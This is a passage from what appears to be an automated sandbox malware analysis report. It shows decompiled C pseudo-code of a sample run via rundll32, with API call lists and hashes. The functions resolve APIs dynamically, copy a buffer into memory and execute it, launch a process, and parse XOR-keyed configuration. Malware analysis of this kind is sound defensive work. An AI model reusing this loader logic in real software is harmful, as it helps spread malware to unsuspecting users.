                                          				_t133 =  *(_t131 + _t76);
                                          				_a4 = _t76;
                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                          				_v56 = _t80;
                                          				_t81 = _t133 + 0x47b0002;
                                          				if(_t80 == 0) {
                                          					_t81 = _t133 & 0x0000ffff;
                                          				}
                                          				_v52 = _t81;
                                          				_t82 =  *0x47bd1a0; // 0x0
                                          				_t116 = 0;
                                          				if(_t82 == 0) {
                                          					L6:
                                          					if(_t138 != 0) {
                                          						L18:
                                          						_t83 =  *0x47bd1a0; // 0x0
                                          						_v48 = _t138;
                                          						if(_t83 != 0) {
                                          							_t116 =  *_t83(2,  &_v72);
                                          						}
                                          						if(_t116 != 0) {
                                          							L32:
                                          							 *_a8 = _t116;
                                          							L33:
                                          							_t85 =  *0x47bd1a0; // 0x0
                                          							if(_t85 != 0) {
                                          								_v40 = _v40 & 0x00000000;
                                          								_v48 = _t138;
                                          								_v44 = _t116;
                                          								 *_t85(5,  &_v72);
                                          							}
                                          							return _t116;
                                          						} else {
                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                          								L27:
                                          								_t116 = GetProcAddress(_t138, _v52);
                                          								if(_t116 == 0) {
                                          									_v40 = GetLastError();
                                          									_t90 =  *0x47bd19c; // 0x0
                                          									if(_t90 != 0) {
                                          										_t116 =  *_t90(4,  &_v72);
                                          									}
                                          									if(_t116 == 0) {
                                          										_a4 =  &_v72;
                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                          										_t116 = _v44;
                                          									}
                                          								}
                                          								goto L32;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                          									_t116 =  *(_a4 + _v16);
                                          									if(_t116 != 0) {
                                          										goto L32;
                                          									}
                                          								}
                                          								goto L27;
                                          							}
                                          						}
                                          					}
                                          					_t98 =  *0x47bd1a0; // 0x0
                                          					if(_t98 == 0) {
                                          						L9:
                                          						_t138 = LoadLibraryA(_v60);
                                          						if(_t138 != 0) {
                                          							L13:
                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                          								FreeLibrary(_t138);
                                          							} else {
                                          								if(_t139[6] != 0) {
                                          									_t102 = LocalAlloc(0x40, 8);
                                          									if(_t102 != 0) {
                                          										 *(_t102 + 4) = _t139;
                                          										_t125 =  *0x47bd198; // 0x0
                                          										 *_t102 = _t125;
                                          										 *0x47bd198 = _t102;
                                          									}
                                          								}
                                          							}
                                          							goto L18;
                                          						}
                                          						_v40 = GetLastError();
                                          						_t104 =  *0x47bd19c; // 0x0
                                          						if(_t104 == 0) {
                                          							L12:
                                          							_a8 =  &_v72;
                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                          							return _v44;
                                          						}
                                          						_t138 =  *_t104(3,  &_v72);
                                          						if(_t138 != 0) {
                                          							goto L13;
                                          						}
                                          						goto L12;
                                          					}
                                          					_t138 =  *_t98(1,  &_v72);
                                          					if(_t138 != 0) {
                                          						goto L13;
                                          					}
                                          					goto L9;
                                          				}
                                          				_t116 =  *_t82(0,  &_v72);
                                          				if(_t116 != 0) {
                                          					goto L33;
                                          				}
                                          				goto L6;
                                          			}
                                          0x00000000
                                          0x047baf6c
                                          0x00000000
                                          0x047baf52
                                          0x047baf40
                                          0x047baf3b
                                          0x047bae81
                                          0x047bae88
                                          0x047bae98
                                          0x047baea1
                                          0x047baea5
                                          0x047baee8
                                          0x047baef4
                                          0x047baf1d
                                          0x047baef6
                                          0x047baefa
                                          0x047baf00
                                          0x047baf08
                                          0x047baf0a
                                          0x047baf0d
                                          0x047baf13
                                          0x047baf15
                                          0x047baf15
                                          0x047baf08
                                          0x047baefa
                                          0x00000000
                                          0x047baef4
                                          0x047baead
                                          0x047baeb0
                                          0x047baeb7
                                          0x047baec7
                                          0x047baeca
                                          0x047baeda
                                          0x00000000
                                          0x047baee0
                                          0x047baec1
                                          0x047baec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047baec5
                                          0x047bae92
                                          0x047bae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x047bae96
                                          0x047bae6f
                                          0x047bae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047BAE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 047BAE9B
                                          • GetLastError.KERNEL32 ref: 047BAEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047BAEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: abcc120fee22777a8114dce329556db8a94ac4d2821282a95a57cd330d19c380
                                          • Instruction ID: 07b74ef3b6b0803b6382a93fb4356a8b0bd7fbe0e128858d835e7bca1e995951
                                          • Opcode Fuzzy Hash: abcc120fee22777a8114dce329556db8a94ac4d2821282a95a57cd330d19c380
                                          • Instruction Fuzzy Hash: A18128B1A00709AFDB21DFA9D885BEEB7F5EB48310F118029E945E7340EB74E905CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E047B30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				signed int _v20;
                                          				void* __esi;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				void* _t46;
                                          				void* _t47;
                                          				void* _t48;
                                          				int _t49;
                                          				intOrPtr _t53;
                                          				WCHAR* _t56;
                                          				void* _t57;
                                          				int _t58;
                                          				intOrPtr _t64;
                                          				void* _t69;
                                          				intOrPtr* _t73;
                                          				void* _t74;
                                          				intOrPtr _t75;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t88;
                                          
                                          				_t74 = __ecx;
                                          				_t79 =  *0x47bd33c; // 0x6cb9bb0
                                          				_v20 = 8;
                                          				_v16 = GetTickCount();
                                          				_t42 = E047B9810(_t74,  &_v16);
                                          				_v12 = _t42;
                                          				if(_t42 == 0) {
                                          					_v12 = 0x47bc19c;
                                          				}
                                          				_t44 = E047B47E1(_t79);
                                          				_v8 = _t44;
                                          				if(_t44 != 0) {
                                          					_t85 = __imp__;
                                          					_t46 =  *_t85(_v12, _t69);
                                          					_t47 =  *_t85(_v8);
                                          					_t48 =  *_t85(_a4);
                                          					_t49 = lstrlenW(_a8);
                                          					_t53 = E047B58BE(lstrlenW(0x47beb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x47beb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                          					_v16 = _t53;
                                          					if(_t53 != 0) {
                                          						_t75 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t73 =  *0x47bd11c; // 0x47babc9
                                          						_t18 = _t75 + 0x47beb38; // 0x530025
                                          						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                          						_t56 =  *_t85(_v8);
                                          						_a8 = _t56;
                                          						_t57 =  *_t85(_a4);
                                          						_t58 = lstrlenW(_a12);
                                          						_t88 = E047B58BE(lstrlenW(0x47bec58) + _a8 + _t57 + _t58 + lstrlenW(0x47bec58) + _a8 + _t57 + _t58 + 2);
                                          						if(_t88 == 0) {
                                          							E047B147E(_v16);
                                          						} else {
                                          							_t64 =  *0x47bd2a4; // 0x24fa5a8
                                          							_t31 = _t64 + 0x47bec58; // 0x73006d
                                          							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                          							 *_a16 = _v16;
                                          							_v20 = _v20 & 0x00000000;
                                          							 *_a20 = _t88;
                                          						}
                                          					}
                                          					E047B147E(_v8);
                                          				}
                                          				return _v20;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 047B3111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 047B314C
                                          • lstrlen.KERNEL32(?), ref: 047B3155
                                          • lstrlen.KERNEL32(00000000), ref: 047B315C
                                          • lstrlenW.KERNEL32(80000002), ref: 047B316A
                                          • lstrlenW.KERNEL32(047BEB38), ref: 047B3173
                                          • lstrlen.KERNEL32(?), ref: 047B31B7
                                          • lstrlen.KERNEL32(?), ref: 047B31BF
                                          • lstrlenW.KERNEL32(?), ref: 047B31CA
                                          • lstrlenW.KERNEL32(047BEC58), ref: 047B31D3
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: fb0e7699258aa842df5a8cc0604af123925565d71775259bd6f812d82c079fa7
                                          • Instruction ID: d31c52a70f32dfc97b7cf745df95fc95b4df083b8440fe6824785ca0ff161ee2
                                          • Opcode Fuzzy Hash: fb0e7699258aa842df5a8cc0604af123925565d71775259bd6f812d82c079fa7
                                          • Instruction Fuzzy Hash: 8831677290020AAFDF12AFA4CD48EDE7BB9EF48358B018065E944A7311DB35EA15DFD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E047B1493(void* __eax, void* __ecx) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				long _v32;
                                          				void _v104;
                                          				char _v108;
                                          				long _t36;
                                          				intOrPtr _t39;
                                          				intOrPtr _t46;
                                          				intOrPtr _t49;
                                          				void* _t57;
                                          				void* _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t69;
                                          
                                          				_t1 = __eax + 0x14; // 0x74183966
                                          				_t67 =  *_t1;
                                          				_t36 = E047B57D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
                                          				_v8 = _t36;
                                          				if(_t36 != 0) {
                                          					L12:
                                          					return _v8;
                                          				}
                                          				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
                                          				_t39 = _v12(_v12);
                                          				_v8 = _t39;
                                          				if(_t39 == 0 && ( *0x47bd260 & 0x00000001) != 0) {
                                          					_v32 = 0;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					_v108 = 0;
                                          					memset( &_v104, 0, 0x40);
                                          					_t46 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t18 = _t46 + 0x47be3e6; // 0x73797325
                                          					_t66 = E047B77E6(_t18);
                                          					if(_t66 == 0) {
                                          						_v8 = 8;
                                          					} else {
                                          						_t49 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t19 = _t49 + 0x47be747; // 0x6cb8cef
                                          						_t20 = _t49 + 0x47be0af; // 0x4e52454b
                                          						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                          						if(_t69 == 0) {
                                          							_v8 = 0x7f;
                                          						} else {
                                          							_v108 = 0x44;
                                          							E047B684E();
                                          							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                          							_push(1);
                                          							E047B684E();
                                          							if(_t57 == 0) {
                                          								_v8 = GetLastError();
                                          							} else {
                                          								CloseHandle(_v28);
                                          								CloseHandle(_v32);
                                          							}
                                          						}
                                          						HeapFree( *0x47bd238, 0, _t66);
                                          					}
                                          				}
                                          				_t68 = _v16;
                                          				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
                                          				E047B147E(_t68);
                                          				goto L12;
                                          			}

                                          APIs
                                            • Part of subcall function 047B57D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047B14AF,?,?,?,?,00000000,00000000), ref: 047B57FD
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047B581F
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047B5835
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047B584B
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047B5861
                                            • Part of subcall function 047B57D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047B5877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 047B14C5
                                          • memset.NTDLL ref: 047B1500
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,047B333A,73797325), ref: 047B77F7
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047B7811
                                          • GetModuleHandleA.KERNEL32(4E52454B,06CB8CEF,73797325), ref: 047B1536
                                          • GetProcAddress.KERNEL32(00000000), ref: 047B153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B15A5
                                            • Part of subcall function 047B684E: GetProcAddress.KERNEL32(36776F57,047B935F), ref: 047B6869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 047B1582
                                          • CloseHandle.KERNEL32(?), ref: 047B1587
                                          • GetLastError.KERNEL32(00000001), ref: 047B158B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: 917840e449b2bd5dc1ae7e17b9b74dd352f95345025e096d9992abfcc99fd220
                                          • Instruction ID: ade785f32626344a450896c8704aba5049f2ba66114560bbf87eb1a7b1ae26a7
                                          • Opcode Fuzzy Hash: 917840e449b2bd5dc1ae7e17b9b74dd352f95345025e096d9992abfcc99fd220
                                          • Instruction Fuzzy Hash: E53134B1900209AFDB21AFE4DD88EDEBBBCEF04344F508565E646E7210D635AE44DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 63%
                                          			E047B4D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t9;
                                          				intOrPtr _t13;
                                          				char* _t28;
                                          				void* _t33;
                                          				void* _t34;
                                          				char* _t36;
                                          				intOrPtr* _t40;
                                          				char* _t41;
                                          				char* _t42;
                                          				char* _t43;
                                          
                                          				_t34 = __edx;
                                          				_push(__ecx);
                                          				_t9 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t1 = _t9 + 0x47be62c; // 0x253d7325
                                          				_t36 = 0;
                                          				_t28 = E047B6027(__ecx, _t1);
                                          				if(_t28 != 0) {
                                          					_t40 = __imp__;
                                          					_t13 =  *_t40(_t28);
                                          					_v8 = _t13;
                                          					_t41 = E047B58BE(_v8 +  *_t40(_a4) + 1);
                                          					if(_t41 != 0) {
                                          						strcpy(_t41, _t28);
                                          						_pop(_t33);
                                          						__imp__(_t41, _a4);
                                          						_t36 = E047B6F33(_t34, _t41, _a8);
                                          						E047B147E(_t41);
                                          						_t42 = E047B4759(StrTrimA(_t36, "="), _t36);
                                          						if(_t42 != 0) {
                                          							E047B147E(_t36);
                                          							_t36 = _t42;
                                          						}
                                          						_t43 = E047B4858(_t36, _t33);
                                          						if(_t43 != 0) {
                                          							E047B147E(_t36);
                                          							_t36 = _t43;
                                          						}
                                          					}
                                          					E047B147E(_t28);
                                          				}
                                          				return _t36;
                                          			}

                                          APIs
                                            • Part of subcall function 047B6027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,047B4D46,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?), ref: 047B608E
                                            • Part of subcall function 047B6027: sprintf.NTDLL ref: 047B60AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?,06CB95B0), ref: 047B4D57
                                          • lstrlen.KERNEL32(?,?,?,047B52FE,?,06CB95B0), ref: 047B4D5F
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • strcpy.NTDLL ref: 047B4D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 047B4D81
                                            • Part of subcall function 047B6F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,047B4D90,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B6F4A
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B4D9E
                                            • Part of subcall function 047B4759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,047B4DAA,00000000,?,?,047B52FE,?,06CB95B0), ref: 047B4763
                                            • Part of subcall function 047B4759: _snprintf.NTDLL ref: 047B47C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: bf46629ff7efb67d99f7212a11cf81c8084e588185a9142e8867434cdb27179f
                                          • Instruction ID: bdfe1c1f94146ed71e133e7e7d8c3cbfbf05ea1ad08f25f3bd5475935502a64b
                                          • Opcode Fuzzy Hash: bf46629ff7efb67d99f7212a11cf81c8084e588185a9142e8867434cdb27179f
                                          • Instruction Fuzzy Hash: 64117373A015257B56227BF49D48EEF2BADDE896A83054125F684AB301DA38ED0187E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E047B98F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				signed int _t18;
                                          				signed int _t23;
                                          				void* _t28;
                                          				char* _t29;
                                          				char* _t30;
                                          				char* _t31;
                                          				char* _t32;
                                          				char* _t33;
                                          				void* _t34;
                                          				void* _t35;
                                          				signed int _t41;
                                          				void* _t43;
                                          				void* _t44;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t54;
                                          				signed int _t58;
                                          				signed int _t62;
                                          				signed int _t66;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t83 = __esi;
                                          				_t80 = __edi;
                                          				_t72 = __ecx;
                                          				_t69 = __ebx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t18 =  *0x47bd2a0; // 0x59935a40
                                          				if(E047B96D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
                                          					 *0x47bd2d0 = _v12;
                                          				}
                                          				_t23 =  *0x47bd2a0; // 0x59935a40
                                          				if(E047B96D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
                                          					_t28 = 2;
                                          					return _t28;
                                          				} else {
                                          					_push(_t69);
                                          					_t70 = _v12;
                                          					_push(_t83);
                                          					_push(_t80);
                                          					if(_t70 == 0) {
                                          						_t29 = 0;
                                          					} else {
                                          						_t66 =  *0x47bd2a0; // 0x59935a40
                                          						_t29 = E047B10CA(_t72, _t70, _t66 ^ 0x48b4463f);
                                          					}
                                          					if(_t29 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
                                          							 *0x47bd240 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t30 = 0;
                                          					} else {
                                          						_t62 =  *0x47bd2a0; // 0x59935a40
                                          						_t30 = E047B10CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
                                          					}
                                          					if(_t30 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
                                          							 *0x47bd244 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t31 = 0;
                                          					} else {
                                          						_t58 =  *0x47bd2a0; // 0x59935a40
                                          						_t31 = E047B10CA(_t72, _t70, _t58 ^ 0x01dd0365);
                                          					}
                                          					if(_t31 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                          							 *0x47bd248 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t32 = 0;
                                          					} else {
                                          						_t54 =  *0x47bd2a0; // 0x59935a40
                                          						_t32 = E047B10CA(_t72, _t70, _t54 ^ 0x3cf823ca);
                                          					}
                                          					if(_t32 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                          							 *0x47bd004 = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t33 = 0;
                                          					} else {
                                          						_t50 =  *0x47bd2a0; // 0x59935a40
                                          						_t33 = E047B10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
                                          					}
                                          					if(_t33 != 0) {
                                          						_t72 =  &_v8;
                                          						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                          							 *0x47bd02c = _v8;
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t34 = 0;
                                          					} else {
                                          						_t46 =  *0x47bd2a0; // 0x59935a40
                                          						_t34 = E047B10CA(_t72, _t70, _t46 ^ 0x163b337e);
                                          					}
                                          					if(_t34 != 0) {
                                          						_push(_t34);
                                          						_t43 = 0x10;
                                          						_t44 = E047BA2EF(_t43);
                                          						if(_t44 != 0) {
                                          							_push(_t44);
                                          							E047B9B10();
                                          						}
                                          					}
                                          					if(_t70 == 0) {
                                          						_t35 = 0;
                                          					} else {
                                          						_t41 =  *0x47bd2a0; // 0x59935a40
                                          						_t35 = E047B10CA(_t72, _t70, _t41 ^ 0x89f501b6);
                                          					}
                                          					if(_t35 != 0 && E047BA2EF(0, _t35) != 0) {
                                          						_t86 =  *0x47bd324; // 0x6cb95b0
                                          						E047B4C3A(_t86 + 4, _t39);
                                          					}
                                          					HeapFree( *0x47bd238, 0, _t70);
                                          					return 0;
                                          				}
                                          			}






























                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B99AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B99DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B9A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B9A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,047B4A8B), ref: 047B9AC3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 75c9b69530f69661c0bb22afcc7f246b8de6ca03f1f425ac0f000b3af6bcc49f
                                          • Instruction ID: 48dbc15172893ab7d01c0b1a18910c838cd767fbcff74e8131cee7250e9a41de
                                          • Opcode Fuzzy Hash: 75c9b69530f69661c0bb22afcc7f246b8de6ca03f1f425ac0f000b3af6bcc49f
                                          • Instruction Fuzzy Hash: F05180E0700544EEE720EAB59E88FDB73ADEB88744B644925E791D3304EA34FD00D6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 047B13B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 047B13C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 047B13DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B1443
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B1452
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B145D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 0dabdf290491c1f243c597d298b2d42eab99f89deb45b4bbd19bbedbf705be63
                                          • Instruction ID: 7fa7da8bba7d1b0b42fa530596429486590f2d5870269feb1e84e3b749f78526
                                          • Opcode Fuzzy Hash: 0dabdf290491c1f243c597d298b2d42eab99f89deb45b4bbd19bbedbf705be63
                                          • Instruction Fuzzy Hash: 9B416D36900A09AFDB01EFF8D854ADEB7B9EF49300F108425E914EB210DA71AD06CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _t23;
                                          				intOrPtr _t26;
                                          				_Unknown_base(*)()* _t28;
                                          				intOrPtr _t30;
                                          				_Unknown_base(*)()* _t32;
                                          				intOrPtr _t33;
                                          				_Unknown_base(*)()* _t35;
                                          				intOrPtr _t36;
                                          				_Unknown_base(*)()* _t38;
                                          				intOrPtr _t39;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E047B58BE(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t23 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t1 = _t23 + 0x47be11a; // 0x4c44544e
                                          					_t48 = GetModuleHandleA(_t1);
                                          					_t26 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t2 = _t26 + 0x47be769; // 0x7243775a
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48, _t2);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E047B147E(_t54);
                                          					} else {
                                          						_t30 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t5 = _t30 + 0x47be756; // 0x614d775a
